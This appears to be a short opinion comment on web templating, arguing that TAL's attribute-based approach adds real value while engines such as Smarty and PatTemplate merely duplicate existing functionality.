TAL (Template Attribute Language) stores it's signals in it's own tag attributes. Hence the name. This means you can build a template filled with mock-content that renders perfectly in any browser without the SSI enviroment and as soon as you integrate it into the templating layer the demo content is automatically replaced by the generated content. A feature pure PHP, JSP, ASP, whatnot code definitely can't provide.

That template processing - and thus TAL - comes with a performance price isn't news - in fact it's the second largest showstopper for templating in general. But apart from all other templating concepts, at least TAL isn't entirely pointless, as it actually adds non-existing functionality to your pipeline, where as Smarty, YATS, PatTemplate and whatnot just add yet another layer of allready existing functionality to a system using their own syntax. The classic 'Inner Plattform' Anti-Pattern.